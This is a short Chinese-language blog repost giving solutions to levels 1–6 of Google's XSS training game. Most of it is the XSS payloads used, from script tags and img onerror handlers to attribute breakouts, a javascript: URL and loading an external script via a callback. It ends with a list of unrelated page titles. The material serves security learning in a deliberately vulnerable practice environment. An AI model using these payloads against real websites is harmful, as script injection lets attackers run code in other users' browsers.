Google XSS Game Level 01-06
来源:互联网 发布:仁化网络问政平台 编辑:程序博客网 时间:2024/06/03 12:39
Ref:https://xss-game.appspot.com/
Dat:20140724
Google说你若能从他们的重要产品中找到一个危险的XSS会得到$7,500,这个Game是为了提高学习XSS的兴趣。
【Level 01:Hello,world of XSS】
无过滤
<script>alert(1)</script>
【Level 02:Persistence is key】
标签变更
<img src=1 onerror=alert(1)>
【Level 03:That sinking feeling...】
img标签的onerror事件
'onerror=alert(1) >
【Level 04:Context matters】
img标签的onload事件
')||alert('1
【Level 05:Breaking protocol】
href标签
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)点击Next>>
【Level 06:Follow the rabbit】
script标签的src属性
%20https://www.google.com/jsapi?callback=alert//或者自己搭建一个https的可以访问的js脚本//或者支持https外链的云盘
0 0
- Google XSS Game Level 01-06
- Google最新XSS Game Writeup
- 有意思的游戏:Google XSS Game
- Google的XSS游戏
- Beginning Game Level Design
- Ratproxy -- Google 的 XSS 检测工具
- google map zoom level
- Networked Game High-level Structure
- Google Play Game Services
- Google Play Game Services LeaderBoard
- XSS
- xss
- xss
- xss
- xss
- xss
- xss
- XSS
- shell升级,Linux系统升级bash---------
- Xcode开发调试技巧总结
- iPad iPhone标准界面收藏
- windows下nginx安装、配置与使用
- 护眼颜色
- Google XSS Game Level 01-06
- 67 三角形面积
- H-index因子
- Android平台下基于XMPP的IM研究(二 MultiUserChat 聊天室)
- 改进你工作方法
- C++技术问题总结-第0篇 类型转换
- oracle表建立索引
- 发布IOS应用程序到苹果APP STORE完整流程
- 一元三次方程求解